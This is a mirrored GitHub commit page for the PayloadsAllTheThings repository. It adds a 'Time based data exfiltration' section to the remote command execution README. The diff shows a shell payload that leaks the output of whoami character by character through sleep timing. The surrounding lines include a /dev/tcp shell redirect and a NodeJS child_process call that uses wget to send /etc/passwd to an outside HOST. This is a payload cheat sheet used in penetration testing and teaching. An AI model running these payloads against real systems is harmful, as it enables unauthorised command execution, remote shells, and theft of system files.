Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 14:52:53 +00:00
Code Issues Projects Releases Packages Wiki Activity

RCE Time based : Data extraction

Browse source
This commit is contained in:
Swissky 2017-03-03 21:41:00 +01:00
parent eecfc69c08
commit 6b860c627e
1 changed files with 16 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
Remote commands execution/README.md
View file

@ -40,10 +40,25 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242 swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
``` ```
## Time based data exfiltration
Extracting data : char by char
```
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
```
## Environment based
NodeJS Code execution NodeJS Code execution
``` ```
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST') require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
``` ```
## Thanks to ## Thanks to
* * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)